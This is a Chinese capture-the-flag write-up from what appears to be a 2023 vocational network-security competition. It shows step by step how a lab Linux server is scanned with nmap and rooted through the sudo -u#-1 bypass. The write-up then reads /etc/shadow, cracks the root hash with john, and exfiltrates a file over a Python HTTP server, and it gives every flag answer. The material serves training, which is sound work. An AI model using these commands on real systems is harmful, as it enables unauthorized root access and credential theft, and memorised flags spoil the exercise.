2023年中职“网络安全“—Linux系统深入提权①

简介: 2023年中职“网络安全“—Linux系统深入提权①

Linux系统深入提权

任务环境说明:

  • 服务器场景:Server2204(关闭链接)
  • 用户名:hacker 密码:123456

1. 使用深入机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;

nmap -p- -sV 靶机IP            # -p- 扫描全部端口,-sV 版本探测

b9bac431026e8bca28e6771f8088b799.png

flag: 2283/tcp

2. 使用深入机对服务器信息收集,并将服务器中主机名称作为flag提交;

ssh hacker@靶机IP -p 2283 -oKexAlgorithms=+diffie-hellman-group1-sha1        # -p 选择端口,-oKexAlgorithms=+diffie-hellman-group1-sha1 加上这个算,你可以点击下面的链接
uname -a             # 查看系统基本信息

legacy.htmle9b37a8c162893d65b5dd814a88fc045.png

flag: KipZ1eze

3. 使用深入机对服务器信息收集,并将服务器中系统内核版本作为flag提交;

uname -a             # 查看系统基本信息

5e177461d5a1ef887583f56e88a53a41.png

flag: 2.6.32-642.el6.x86_64

4. 使用深入机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;

sudo -u#-1 bash                # sudo 版本小于1.8.28,当前用户存在于sudo权限列表

0054296a9eab723b8edfd072c8bb19ec.png

cd /root            # 进入root文件夹
ls -la              # 查看当前文件夹下的所有文件,并且以列表方式输出
cat key.txt         # 查看key.txt文本内容

4b2d54d9ad3aab78683adcd3a9ab2479.png

flag: 7QcSI8kK

5. 使用深入机对服务器管理员提权,并将服务器中root的密码作为flag提交;

cat /etc/shadow            # 查看root的shadow文件

05e4b1ce8d4418431d8a88bc08cf75cb.png

vim hash            # 把root信息行写入进去
cat hash            # 查看是否写入成功
john hash           # 破解密码

67b449c331c24879042eb342dc06dcac.png

lag: Woodrow

6. 使用深入机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。

pwd                                # 查看当前目录
ls -la              # 查看当前文件夹下的所有文件,并且以列表方式输出
python -m SimpleHTTPServer 8080    # 在8080端口开启一个HTTP服务

642fde8bf3872c8ca073510f0892fb98.png

访问的时候一定要指定8080端口

d816d2d2e4dc81ec480bbb6574d9d599.png

flag: uB81UvW0


目录
打赏
0
0
0
0
7
分享
相关文章
第十六届山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题—B模块安全事件响应/网络安全数据取证/应用安全
该内容描述了一次网络安全演练,包括七个部分:Linux渗透提权、内存取证、页面信息发现、数字取证调查、网络安全应急响应、Python代码分析和逆向分析。参与者需在模拟环境中收集Flag值,涉及任务如获取服务器信息、提权、解析内存片段、分析网络数据包、处理代码漏洞、解码逆向操作等。每个部分都列出了若干具体任务,要求提取或生成特定信息作为Flag提交。
250 0
2022年中职“网络安全“江西省赛题解析—B-1:Windows操作系统深入
2022年中职“网络安全“江西省赛题解析—B-1:Windows操作系统深入
185 1
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-A模块安全事件响应/网络安全数据取证/应用安全
该内容描述了一个网络安全挑战,涉及Windows和Linux系统的渗透测试以及隐藏信息探索和内存取证。挑战包括使用Kali Linux对Windows Server进行服务扫描、DNS信息提取、密码获取、文件名和内容查找等。对于Linux系统,任务包括收集服务器信息、提权并查找特定文件内容和密码。此外,还有对Server2007网站的多步骤渗透,寻找登录界面和页面中的隐藏FLAG。最后,需要通过FTP获取win20230306服务器的内存片段,从中提取密码、地址、主机名、挖矿程序信息和浏览器搜索关键词。
169 0
2022年中职组“网络安全”赛项吉安市竞赛解析
2022年中职组“网络安全”赛项吉安市竞赛解析
278 0
2023年中职“网络安全“—数字调查取证(attack817.pcapng)
2023年中职“网络安全“—数字调查取证(attack817.pcapng)
228 0
2021年中职“网络安全“江西省赛题—A模块解析
2021年中职“网络安全“江西省赛题—A模块解析
417 1
2021年中职“网络安全“江西省赛题—A模块解析
2024年山东省职业院校技能大赛中职组 “网络安全”赛项竞赛试题-B模块安全事件响应/网络安全数据取证/应用安全
该文本描述了一组网络安全挑战,涉及Windows渗透测试、数字取证和Web安全。挑战包括使用Kali Linux进行系统扫描、DNS信息提取、管理员密码获取、文件名和内容检索以及图片中单词的识别。此外,还有针对FTPServer的数据包分析,寻找恶意用户活动的痕迹如HTTP访问、端口扫描、密码和木马密码。在Web安全部分,需通过渗透测试不同页面,解决一系列逻辑谜题以获取Flag。最后,有跨站脚本渗透测试,要求访问多个服务器目录并依据页面提示触发弹框以获得Flag。
167 0
第十六届山东省职业院校技能大赛中职组网络安全赛项竞赛正式试题
第十六届山东省职业院校技能大赛中职组网络安全赛项竞赛正式试题
2024年甘肃省职业院校技能大赛中职组 “网络安全”赛项竞赛样题-A模块安全事件响应/网络安全数据取证/应用安全
该文描述了四个网络安全相关任务,涉及Windows和Linux系统的渗透测试、隐藏信息探索及内存取证。任务包括:使用Kali Linux对Windows Server进行服务扫描、DNS信息获取、管理员密码破解等;对Linux系统进行SSH端口、主机名和内核版本收集,以及提权操作;探索隐藏在网站不同位置的FLAG;从内存片段中提取主机信息,如管理员密码、程序地址等;最后是对Linux服务器的渗透,获取端口号、主机名、内核版本和管理员密码等。每个任务都要求提交特定的Flag值作为完成证明。
152 0

热门文章

最新文章

AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等